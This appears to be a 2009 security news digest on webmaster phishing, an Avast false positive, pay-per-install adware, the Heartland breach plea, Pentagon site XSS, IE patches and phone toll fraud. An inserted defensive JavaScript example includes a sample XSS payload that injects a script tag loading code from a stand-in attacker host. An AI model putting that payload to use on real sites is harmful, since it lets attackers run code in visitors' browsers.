Wednesday 9 December 2009

Hackers Target Webmasters in cPanel Login Phish

Fraudsters are targeting webmasters in a massive phishing campaign that attempts to trick marks into giving up credentials needed to administer their sites.

The emails are sent to customers of some of the world's most widely used webhosts, including GoDaddy, Hostgator, Yahoo!, and 50Webs. Although the subject lines vary, they all purport to come from the hosting service. In all, admins from at least 90 different webhosts are being targeted.

"Due to the system maintenance, we kindly ask you to take a few minutes to confirm your FTP details," the emails state.

Those who take the bait are led to a website formatted to look like a page from cPanel, the widely used website administration program. Once a website's address and FTP credentials are entered, users are directed to their host's login page.

Over the past year, scammers have increasingly targeted administrators of legitimate websites. According to a review in the third quarter of this year by security firm Dasient, 5.8 million pages from 640,000 websites were infected with code designed to launch malware attacks on visitors. ScanSafe, a separate security firm, has been tracking a single infection known as Gumblar that's taken over at least 2,000 websites by stealing their administrator credentials.

The latest phishing campaign was uncovered by Gary Warner, the director of research in computer forensics at the University of Alabama at Birmingham. It's unclear if it has any relation to Gumblar or what exactly happens to a site whose admin has fallen for the scam. His report is here.

Avast's Human error!

Popular free of charge anti-virus scanner Avast went berserk late last week and began classifying legitimate files as infected.

Legitimate products were wrongly classified as harbouring the Delf-MZG Trojan or other strains of malware and whisked off to quarantine following the publication of a dodgy update. Avast has published a new update that eliminates the wrongful classification glitch. However, that still leaves users who applied the earlier update with borked systems.

False positives are a well-known shortcoming of anti-malware scanners. Avast's snafu last Thursday was only unusual because it classified a large number of legitimate programmes as malign. Software from Adobe, Realtek sound card drivers and various media players were all affected.

Avast has published an apology for the cock-up and advice on restoring systems in a blog post (here) and its forum (here).

The anti-virus firm blamed "human error" for the mix-up.

Adware touts $1 bribe to prospective zombies

An adware distributor is offering to pay punters $1 to install their crud.

The bribe comes attached to malware, specifically an application bundle that includes adware and agents that change browser home pages, detected by Sunbelt Software as C4DLMedia and classified as a medium risk threat. The offer of payment is buried in the application's terms and conditions.

Even if the adware slingers come through on this offer to pay via PayPal, the amount of the bribe is probably a problem. "In places where a dollar is worth enough to make this worth the effort, there probably isn’t any internet connectivity," writes Sunbelt security researcher Tom Kelchner.

Sunbelt's blog contains a screenshot illustrating C4DLMedia's terms and conditions here.

Even though $1 barely stretches to a pint of milk these days, the price on offer from C4DLMedia (taken at face value) appears high. Pay-per-install malware affiliates typically earn far, far less. Recent research found that malware affiliates might earn only $140 per 1,000 US-based machines they infect, between $30-$110 for Western European infections and just $6 per 1,000 infected computers located in Asia.

TJX Hacker to Plead Guilty to Heartland Breach

By Kim Zetter
Threat Level
Wired.com
December 8, 2009

Admitted TJX intruder Albert Gonzalez has entered into a plea agreement
on charges that he hacked into Heartland Payment Systems, Hannaford
Brothers, 7-Eleven and two other unnamed national retailers.

The revelation comes in a filing made by Gonzalez's attorney in U.S.
District Court in New Jersey, where the Heartland charges were filed in
August.

A federal judge on Tuesday officially transferred the New Jersey case to
Massachusetts, where Gonzalez is seeking to merge it with two other
cases in which he’s already pleaded guilty.

Gonzalez, a former Secret Service informant known by the online nicks
"segvec" and "Cumbajohnny," was charged in New Jersey in August, along
with two unnamed Russian hackers. They were accused of stealing more
than 130 million debit and credit cards from card-processing company
Heartland and the other target companies.

Gonzalez and 10 others were also charged in May 2008 in New York and in
August 2008 in Massachusetts with network intrusions into TJX,
OfficeMax, Dave & Busters restaurant chain and other companies. Gonzalez
pleaded guilty to these charges in August and was scheduled to be
sentenced in Massachusetts on Dec. 21 in both cases.

Hacker Exposes Unfixed Security Flaws In Pentagon Website

By Kelly Jackson Higgins
DarkReading
Dec 08, 2009

A Romanian hacker has posted a proof-of-concept attack exploiting
vulnerabilities on the Pentagon's public Website that were first exposed
several months ago and remain unfixed.

The hacker, who goes by Ne0h, demonstrated input validation errors in
the site's Web application that allow an attacker to wage a cross-site
scripting (XSS) attack. The XSS vulnerability had been previously
disclosed by at least two other researchers several months ago -- and
Ne0h's findings show the bug is still on the site.

The site, which is run by the Office of the Assistant Secretary of
Defense for Public Affairs, is basically a tourist site for the Pentagon
and doesn't appear to house any sensitive data. But a security
researcher who studied Ne0h's work says the Pentagon Website could
be used to redirect users to a malicious site posing as the Pentagon
site.

Daniel Kennedy, partner with Praetorian Security Group, says the session
ID appears to be a tracking cookie, and JavaScript can be injected into
the page itself to redirect a user to another site, for instance. "Since
I can pass that page a reference to an external JavaScript, I can do
most anything I can do in JavaScript," says Kennedy, who blogged about
the find yesterday. "That includes basic stuff, like crafting a URL to
send to users that appears to be from the Pentagon, but actually
redirects to 'evil.org,'" for example, he says.
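As an added illustration of the reflected-injection pattern Kennedy describes (example code written for this digest, not from the article or the Pentagon site; the function names, the page host and the hostile sample value are constructed), here is a page that reflects a "session ID" parameter into its HTML in a vulnerable and a hardened form, plus a check that flags script references pointing off-site:

```javascript
// Added example, not from the DarkReading article. Function names and
// host names are hypothetical.

// Minimal HTML escaping for text placed inside an element body or a
// double-quoted attribute.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: the parameter is concatenated straight into the markup, so
// anything the URL carries (including a <script src=...> reference to an
// external file) becomes part of the page the browser parses.
function renderTrackingPageUnsafe(sessionId) {
  return '<html><body><div id="sid">' + sessionId + '</div></body></html>';
}

// Hardened: the same parameter is HTML-escaped before insertion, so the
// browser renders it as literal text and never as markup.
function renderTrackingPageSafe(sessionId) {
  return '<html><body><div id="sid">' + escapeHtml(sessionId) + '</div></body></html>';
}

// Regression check for a rendered response: list every <script src> whose
// host is neither the page's own origin nor an explicitly allowed host.
function findForeignScriptSources(html, pageOrigin, allowedHosts) {
  const allowed = [new URL(pageOrigin).host].concat(allowedHosts);
  const found = [];
  const re = /<script[^>]*\ssrc\s*=\s*["']([^"']+)["']/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    let host = '';
    try { host = new URL(m[1], pageOrigin).host; } catch (e) { host = ''; }
    if (!allowed.includes(host)) found.push(m[1]);
  }
  return found;
}

// Constructed sample values: a benign session ID and one that closes the
// attribute context and drops in an external script reference.
const PAGE_ORIGIN = 'https://www.example.invalid';
const BENIGN_ID = 'a1b2c3d4';
const HOSTILE_ID = '"><script src="https://attacker.invalid/x.js"></script>';

console.log('unsafe page flags:', findForeignScriptSources(renderTrackingPageUnsafe(HOSTILE_ID), PAGE_ORIGIN, []));
console.log('safe page flags:', findForeignScriptSources(renderTrackingPageSafe(HOSTILE_ID), PAGE_ORIGIN, []));
```

Run with `node` to see the unsafe render flag the foreign script while the escaped render flags nothing; the same check can be pointed at crawled copies of a site's pages.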

Microsoft plugs zero-day IE hole

By Elinor Mills
InSecurity Complex
CNet News
December 8, 2009

Microsoft released fixes on Tuesday for critical vulnerabilities in
Internet Explorer, including one for which exploit code has been
released.

Adobe, meanwhile, was scheduled to release a critical update affecting
Flash Player and Adobe AIR, following news of exploit code being
released for a vulnerability in Illustrator CS3 and CS4 on Windows and
Mac last week.

Microsoft's regular Patch Tuesday release includes six security
bulletins addressing 12 vulnerabilities in IE, Windows, Windows Server,
and Office.

However, priority should be given to the cumulative IE bulletin, which
affects IE 6, IE 7, and IE 8 on all major Windows versions, including
Windows 7. The bulletin fixes five holes that could allow an attacker to
remotely take control over a system in drive-by download attacks. The
fix also addresses a problem with ActiveX controls built with Microsoft
Active Template Library (ATL) headers that could allow remote code
execution.

"Vulnerabilities in IE are generally pretty serious because all you have
to do is go to a Web page or get referred to one" that has malicious
code on it, said Jason Avery, manager of the Digital Vaccine service at
Tipping Point. Three of the IE holes were disclosed through Tipping
Point's Zero Day Initiative program over the summer, he said.

Hacker charges $43,000 in calls to Buffalo Grove firm's phone

By KATHY ROUTLIFFE
Pioneerlocal.com
December 8, 2009

"Reach out and trick someone" could be the slogan of a hacker who
charged $43,000 in telephone calls -- mostly to Cuba -- to a Buffalo
Grove worker's company phone within a period of days.

Police reported that an employee at RMS Technologies, 1359 N. Barclay
Blvd., became aware someone had hacked into the phone system to make
free calls after his phone service carrier warned of the unusual
activity between Oct. 9 and 12.

"As far as how the technology works to rack up that many calls, we don't
know," police Cmdr. Steven Husak said Monday. "(The employee's) phone
carrier alerted him to the situation, and he thought he had resolved it
until he received the bill."
